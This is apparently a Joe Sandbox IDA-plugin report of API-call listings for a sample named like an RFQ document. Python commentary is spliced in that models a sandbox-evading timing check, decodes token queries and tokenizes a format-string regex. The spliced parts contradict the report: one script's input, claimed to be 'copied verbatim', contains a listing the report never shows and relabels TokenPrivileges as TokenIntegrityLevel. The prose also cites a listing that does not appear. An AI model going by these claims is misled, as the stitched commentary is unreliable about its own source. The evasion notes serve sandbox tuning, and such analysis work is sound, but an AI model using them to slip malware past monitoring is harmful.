                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: dc8b22e1e65615efee7cb89e9f9d00452fabf181bee7d68f289bb4a8637ec837
                                              • Instruction ID: d79d033969ab8b85d89fff0acef51d8eaa38ed6caedf2edeadb2b8cce6669fd4
                                              • Opcode Fuzzy Hash: dc8b22e1e65615efee7cb89e9f9d00452fabf181bee7d68f289bb4a8637ec837
                                              • Instruction Fuzzy Hash: 51016271201204FFEB104FA5EC48D67BB6DFF86355B20043DF849C2260DB718C51CA60
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00145502
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00145510
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00145518
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00145522
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0014555E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 0d12cd06d310883b2f4202e4efd353e32fdf216e6875e4a72e5cfa5f73ed073f
                                              • Instruction ID: 29e560129661879f0e6458e8abc03cb7c57edb9afb9a6d63abaaf6cb439e2b42
                                              • Opcode Fuzzy Hash: 0d12cd06d310883b2f4202e4efd353e32fdf216e6875e4a72e5cfa5f73ed073f
                                              • Instruction Fuzzy Hash: 08013932C00A1DDBCF009BE8EC885EDBB7ABB09701F01005AE805F6551DB709690C7A1
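The five calls in the listing above (QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, QueryPerformanceCounter, Sleep) are the usual delay-measurement check used to detect debuggers and sandboxes: read the high-resolution counter, sleep, read it again, and compare the elapsed time with the delay that was requested. A monitor that hooks Sleep to return early, a common sandbox shortcut to get past long delays, leaves an implausibly small gap. What follows is an added Python model of that check, not code from the sample or from Joe Sandbox. The VirtualClock class and the 0.5 tolerance are constructed for the example; the sample's real threshold and what it does on detection are not visible in the report.

```python
import time


class VirtualClock:
    """Stand-in for a monitored environment (constructed for this example).

    advance_ratio is the fraction of every requested sleep that the environment
    really lets pass: 1.0 behaves like bare metal, 0.0 is a hook that makes
    Sleep return at once without touching the high-resolution counter.
    """

    def __init__(self, advance_ratio):
        self.advance_ratio = advance_ratio
        self.now_s = 0.0

    def now(self):
        # Plays the role of QueryPerformanceCounter / QueryPerformanceFrequency,
        # already converted to seconds.
        return self.now_s

    def sleep(self, seconds):
        # Plays the role of Sleep: the clock advances only as far as the
        # environment allows.
        self.now_s += seconds * self.advance_ratio


def timing_check(sleep_ms, clock=time.perf_counter, sleep=time.sleep, tolerance=0.5):
    """Counter -> Sleep -> Counter, as in the listing above.

    Returns (accelerated, elapsed_ms). accelerated is True when less than
    tolerance * sleep_ms really elapsed, i.e. something shortened the sleep.
    The 0.5 tolerance is an assumption; clock() must return seconds, so the
    division by the counter frequency is implicit.
    """
    start = clock()
    sleep(sleep_ms / 1000.0)
    elapsed_ms = (clock() - start) * 1000.0
    return elapsed_ms < tolerance * sleep_ms, elapsed_ms


if __name__ == "__main__":
    # Real clock: the sleep is honoured, so the check passes.
    print("bare metal:", timing_check(50))
    # Hooked Sleep that returns immediately: the check fires.
    skipping = VirtualClock(0.0)
    print("sleep hook:", timing_check(500, clock=skipping.now, sleep=skipping.sleep))
    # Hook that also fast-forwards the counter: indistinguishable from bare metal.
    consistent = VirtualClock(1.0)
    print("consistent hook:", timing_check(500, clock=consistent.now, sleep=consistent.sleep))
```

The third case is the point for anyone building or tuning a sandbox: skipping Sleep alone is caught by this check, while a hook that advances the performance counter by the same amount it skipped is not, so Sleep and the time sources have to be patched consistently.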
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?,?,0013799D), ref: 0013766F
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 0013768A
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 00137698
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?), ref: 001376A8
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 001376B4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: c241b9ad370281d5f045180662a4bbba08bb59f8eced00c5e8a2b8234c1eafba
                                              • Instruction ID: f7a89eaa8d168ccd9caff11bee3a11d65d12036fb3da0a8854373a86dbaf416e
                                              • Opcode Fuzzy Hash: c241b9ad370281d5f045180662a4bbba08bb59f8eced00c5e8a2b8234c1eafba
                                              • Instruction Fuzzy Hash: B401D4F3604604BBEB205F59EC05BAA7BECEB44751F100068FD04D3261E771DD4187A0
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00138608
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00138612
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00138621
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00138628
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0013863E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 16776ce998022cc7fb99c71f3b971536c0cf0adb402fa04fe41fa5dde2ddf8d2
                                              • Instruction ID: ba5243e407e7d481cebb79089da8656e6fd6d199038352f1d23b9910a0d44e7a
                                              • Opcode Fuzzy Hash: 16776ce998022cc7fb99c71f3b971536c0cf0adb402fa04fe41fa5dde2ddf8d2
                                              • Instruction Fuzzy Hash: 4BF04F75201314AFEB100FA9EC8AE6B3BADFF8A754F10042DF945D7150CBA19C82DA60
                                              APIs
                                               • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00138669
                                               • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00138673
                                               • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00138682
                                               • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00138689
                                               • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 0013869F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 423a41db3b6f3aff710ca8b0effa95a55bcc6d3c0b6e94232746885e65aecc61
                                              • Instruction ID: d42c8a76fbc3c158573b65695247ce097240336f30748ad1c712aed7e87471a7
                                              • Opcode Fuzzy Hash: 423a41db3b6f3aff710ca8b0effa95a55bcc6d3c0b6e94232746885e65aecc61
                                              • Instruction Fuzzy Hash: A2F062B5201314AFEB111FA5EC89E777BADFF8A754F100029F945C6150CBB5DD82DA60
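The GetUserObjectSecurity listing above and the two GetTokenInformation listings are one Win32 idiom repeated three times: call with a NULL buffer to learn the required size, read GetLastError, HeapAlloc that many bytes, call again with the buffer. What distinguishes the two token functions is the second argument, the TOKEN_INFORMATION_CLASS. The script below is an added Python example, not part of the report or of Joe Sandbox: it parses call listings in this report's bullet format, flags the probe-allocate-requery idiom, and decodes that argument against the numbering in winnt.h, where 2 is TokenGroups and 3 is TokenPrivileges (TokenIntegrityLevel is 25; the script ignores any parenthesised annotation and uses only the number). REPORT_EXCERPT is copied from those three listings as the tool emitted them; the ALLOCATORS set is an assumption covering the usual Win32 allocators.

```python
import re

# Subset of TOKEN_INFORMATION_CLASS as numbered in winnt.h. Only the numeric
# argument is trusted: 3 is TokenPrivileges, TokenIntegrityLevel is 25.
TOKEN_INFORMATION_CLASS = {
    1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 4: "TokenOwner",
    18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel",
}

# Assumption: allocators that may sit between the two calls of the idiom.
ALLOCATORS = {"HeapAlloc", "LocalAlloc", "GlobalAlloc", "VirtualAlloc"}

# One "• Api.Module(args), ref: addr" line of the report; the argument list is optional.
CALL_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Constructed input: the three call listings from this report, copied verbatim.
REPORT_EXCERPT = """\
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00138766
• GetLastError.KERNEL32(?,0013822A,?,?,?), ref: 00138770
• GetProcessHeap.KERNEL32(00000008,?,?,0013822A,?,?,?), ref: 0013877F
• HeapAlloc.KERNEL32(00000000,?,0013822A,?,?,?), ref: 00138786
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013879D
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00138608
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00138612
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00138621
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00138628
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0013863E
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00138669
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00138673
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00138682
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00138689
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0013869F
"""


def parse_blocks(text):
    """Split report text at each 'APIs' header; return a list of (api, args, ref) per function.

    'Part of subcall function' lines describe a callee and are skipped. Parenthesised
    annotations such as 00000003(TokenIntegrityLevel) are stripped from the arguments.
    """
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        if current is None or "Part of subcall" in line:
            continue
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = re.sub(r"\([^)]*\)", "", m.group("args") or "")
        args = [a.strip() for a in raw.split(",") if a.strip()]
        current.append((m.group("api"), args, m.group("ref")))
    return blocks


def size_probe_idiom(calls):
    """APIs called twice in one function with GetLastError and an allocator in between.

    That is the 'ask for the size, allocate, ask again' pattern; the ref of the
    first call is returned so it can be cross-referenced with the listing.
    """
    names = [api for api, _, _ in calls]
    found = []
    for i, (api, _, ref) in enumerate(calls):
        if api == "GetLastError" or api in ALLOCATORS or api not in names[i + 1:]:
            continue
        j = i + 1 + names[i + 1:].index(api)
        between = set(names[i + 1:j])
        if "GetLastError" in between and between & ALLOCATORS:
            found.append((api, ref))
    return found


def token_queries(calls):
    """Decode the TokenInformationClass argument of every GetTokenInformation call."""
    out = []
    for api, args, ref in calls:
        if api != "GetTokenInformation" or len(args) < 2:
            continue
        try:
            cls = int(args[1], 16)
        except ValueError:
            continue
        out.append((ref, TOKEN_INFORMATION_CLASS.get(cls, f"class {cls}")))
    return out


if __name__ == "__main__":
    for n, calls in enumerate(parse_blocks(REPORT_EXCERPT), 1):
        print(f"function {n}: probe idiom {size_probe_idiom(calls)}; token classes {token_queries(calls)}")
```

Reading the decoded output: a TokenGroups query is what a group-membership test (for example, "is this token in the Administrators group") needs, and a TokenPrivileges query enumerates the token's privileges; neither is an integrity-level read. The idiom itself is benign runtime code, which is why the report lists it without a signature, but decoding the class is what tells an analyst what the runtime wanted to know about its own token.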
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C6BA
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0013C6D1
                                              • MessageBeep.USER32(00000000), ref: 0013C6E9
                                              • KillTimer.USER32(?,0000040A), ref: 0013C705
                                              • EndDialog.USER32(?,00000001), ref: 0013C71F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 22d772410370331ae4bf7d3337e52cac4d870890c3195db49d5dc59a3a9db015
                                              • Instruction ID: e488304f7e50e93a0a4067bad183568c945d032cb83f59de424485621c5f456a
                                              • Opcode Fuzzy Hash: 22d772410370331ae4bf7d3337e52cac4d870890c3195db49d5dc59a3a9db015
                                              • Instruction Fuzzy Hash: 2C016270504704ABEB25AB24ED4EF9677B8FF00746F00066DF546B14E1DBE1A9998F90
                                              APIs
                                              • EndPath.GDI32(?), ref: 000E13BF
                                              • StrokeAndFillPath.GDI32(?,?,0011BAD8,00000000,?), ref: 000E13DB
                                              • SelectObject.GDI32(?,00000000), ref: 000E13EE
                                              • DeleteObject.GDI32 ref: 000E1401
                                              • StrokePath.GDI32(?), ref: 000E141C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 0032c758a96250e4626027d707f43c542aa19e273899920ffe6674aedc1bf7cd
                                              • Instruction ID: 41626e866517a3a1d4bee5b377992aba8e738cf8faf8ae5505f73fadd7f6e0c2
                                              • Opcode Fuzzy Hash: 0032c758a96250e4626027d707f43c542aa19e273899920ffe6674aedc1bf7cd
                                              • Instruction Fuzzy Hash: 48F0C474005348EFDB215F26EC0C7983FA9AB02726F088228F42A959F1C77989E6DF51
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 000E7BB1: _memmove.LIBCMT ref: 000E7C0B
                                              • __swprintf.LIBCMT ref: 000F302D
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000F2EC6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: fd7625a258661f774721bbfa458835724f597b558d1d87cd356a44f0b3ed2851
                                              • Instruction ID: d2b3fdb86b32427a5cf2988ac2b23915ffc2859f11bc12959b4e0123830af2c1
                                              • Opcode Fuzzy Hash: fd7625a258661f774721bbfa458835724f597b558d1d87cd356a44f0b3ed2851
                                              • Instruction Fuzzy Hash: D791BD311083559FCB28EF24D995CBEB7E4EF95710F04091EF986A72A2DB60EE04CB52
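The string referenced at 000F2EC6 next to the __swprintf call is a regular expression that describes which pieces of a format string the function is prepared to pass on: backslash escapes, a doubled percent sign, and a conversion built from the flags `-+ 0#`, a numeric or `*` width, a numeric or `*` precision, one of the length modifiers `h`, `l`, `L`, and one of the conversions `d i o u x X e E f g G s`. `%n` and `%p` are not in that class, and a doubled `ll` modifier is not either. The tokenizer below is an added Python example that applies the page's regex as written; it is not the runtime's own code. How the runtime treats a `%` the pattern does not accept is not visible in the report, so reporting it as a bad token is an assumption.

```python
import re

# The pattern recovered from the sample's string table (the Strings entry above).
# Accepted conversions are d i o u x X e E f g G s; %n and %p are not in the class.
FORMAT_TOKEN = re.compile(
    r"\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]"
)


def tokenize(fmt):
    """Walk fmt and return (kind, text) tokens.

    kind is 'escape' (a backslash sequence the regex accepts), 'percent' (%%),
    'spec' (a conversion the regex accepts), 'literal' (everything else) or
    'bad' (a % the regex does not accept). Flagging an unmatched % is an
    assumption; the report does not show how the runtime handles it.
    """
    tokens, literal, pos = [], [], 0

    def flush():
        if literal:
            tokens.append(("literal", "".join(literal)))
            literal.clear()

    while pos < len(fmt):
        m = FORMAT_TOKEN.match(fmt, pos)
        if m:
            flush()
            text = m.group(0)
            kind = "escape" if text[0] == "\\" else "percent" if text == "%%" else "spec"
            tokens.append((kind, text))
            pos = m.end()
        elif fmt[pos] == "%":
            # A % that starts nothing the regex accepts: e.g. %n, %p, %ll, a trailing %.
            flush()
            bad = fmt[pos:pos + 2]
            tokens.append(("bad", bad))
            pos += len(bad)
        else:
            literal.append(fmt[pos])
            pos += 1
    flush()
    return tokens


def is_safe_format(fmt):
    """True when every % in fmt belongs to a token the regex accepts."""
    return all(kind != "bad" for kind, _ in tokenize(fmt))


def expected_args(fmt):
    """Variadic arguments the accepted specs consume: one each, plus one per * width or precision."""
    return sum(1 + text.count("*") for kind, text in tokenize(fmt) if kind == "spec")


if __name__ == "__main__":
    for sample in ("Value: %s = %5.2f%%", "%*.*f %s", "%n", "%p", "%-08.3lf"):
        print(f"{sample!r}: safe={is_safe_format(sample)} args={expected_args(sample)} {tokenize(sample)}")
```

The two checks are the ones that matter when a format string can be influenced by input: `is_safe_format` rejects conversions that write memory or leak pointers, and `expected_args` gives the count a caller should compare against the arguments it actually supplies before anything reaches swprintf.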
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 001052DD
                                                • Part of subcall function 00110340: __87except.LIBCMT ref: 0011037B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 513ca2a6b8a92b3f8c479f60083a207dc149040491020d1c51bc2dc3fa776f14
                                              • Instruction ID: 62ee1c773fdba025290c376b23f8505408894bd80193c899ff06db6e4fe872ca
                                              • Opcode Fuzzy Hash: 513ca2a6b8a92b3f8c479f60083a207dc149040491020d1c51bc2dc3fa776f14
                                              • Instruction Fuzzy Hash: E2514831E1D60287CB1A6714C9813AF2B95AB14750F204978E0D98AAE5EFF48CD49E46
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: dda348b537d3519642c8d344dbb9ef72a8ecb004ef47ff50a33e9f642749fedb
                                              • Instruction ID: 673dc6cf645acffc64c8571da1f375769be0d0d1520592cde7e9b5a15e470150
                                              • Opcode Fuzzy Hash: dda348b537d3519642c8d344dbb9ef72a8ecb004ef47ff50a33e9f642749fedb
                                              • Instruction Fuzzy Hash: C7513174504686CFCF169FA8C8886FA7BA5FF19710F184055EC91AF2E0DB709D42CB60
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 3e2d3382db4eea230d4244c90edab5ba7093333957fef153940bf149f0f8760e
                                              • Instruction ID: b32f600b88b9c2f005f90a2b96da91e66766b10440316f578ba231fad5a570ba
                                              • Opcode Fuzzy Hash: 3e2d3382db4eea230d4244c90edab5ba7093333957fef153940bf149f0f8760e
                                              • Instruction Fuzzy Hash: 8051A2719003099BDB24DF65C9817EABBF4EF04714F24856EEA4AD7641E771AA84CB40
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001676D0
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001676E4
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00167708
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: 479b16d14641e5938634f1d37bfb97579559d65db6be56db3c6eee8ca32812c1
                                              • Instruction ID: b906990808f2a321a03c68b5190415f4b13ffdbcc445a703eb8066521e1db815
                                              • Opcode Fuzzy Hash: 479b16d14641e5938634f1d37bfb97579559d65db6be56db3c6eee8ca32812c1
                                              • Instruction Fuzzy Hash: DB21B232504219BBDF15CFA4DC86FEA3B79EF48718F110214FE156B1D1DBB1A8A18BA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00166FAA
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00166FBA
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00166FDF
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: fcc750225f0951296b12270113cedb40d3f3e2ca0cc81eb48cf79428b195e477
                                              • Instruction ID: 1a2bbdc1ba9a756c4b441a0f4c1d6a9614211d19cc23a9d5481238997e3aa987
                                              • Opcode Fuzzy Hash: fcc750225f0951296b12270113cedb40d3f3e2ca0cc81eb48cf79428b195e477
                                              • Instruction Fuzzy Hash: 5421A472614118BFDF158F54EC85FEB37AAEF89754F018164F9149B190C771AC61CBA0
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0013914F
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00139166
                                              • SendMessageW.USER32(?,0000000D,?,00000000), ref: 0013919E
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: 890662a5f3ad44e24c5769ffcb7aeaf08d4988b5deaf12a7f9c6204f89a313b1
                                              • Instruction ID: 90d8fd8227e4f6c40ee241cdefea08555ef743e6aab553ebd18944446b80a3ad
                                              • Opcode Fuzzy Hash: 890662a5f3ad44e24c5769ffcb7aeaf08d4988b5deaf12a7f9c6204f89a313b1
                                              • Instruction Fuzzy Hash: 7B219272604109BBDF20EBA8DC459BEF7BDAF44350F11045AF505E32A0DBB1AD409BA0
                                              APIs
                                              • SendMessageW.USER32(00000402,00000000,00000000), ref: 0015613B
                                              • SendMessageW.USER32(0000000C,00000000,?), ref: 0015617C
                                              • SendMessageW.USER32(0000000C,00000000,?), ref: 001561A4
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: ce45fce333e4231bcf29f65c38ef6b2f17183edb7c270921e08f0d1212fefac7
                                              • Instruction ID: 489f2b00435b9dc933ec166fb985dad548833197842993ec0a660307156fc6c2
                                              • Opcode Fuzzy Hash: ce45fce333e4231bcf29f65c38ef6b2f17183edb7c270921e08f0d1212fefac7
                                              • Instruction Fuzzy Hash: 26214A75200901EFDB10AB25DD85D6AB7E5FB89311B418059F9199BA72CB60BC91CB90
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001679E1
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001679F6
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00167A03
                                              Strings
                                              Similarity
                                              • API ID: MessageSend
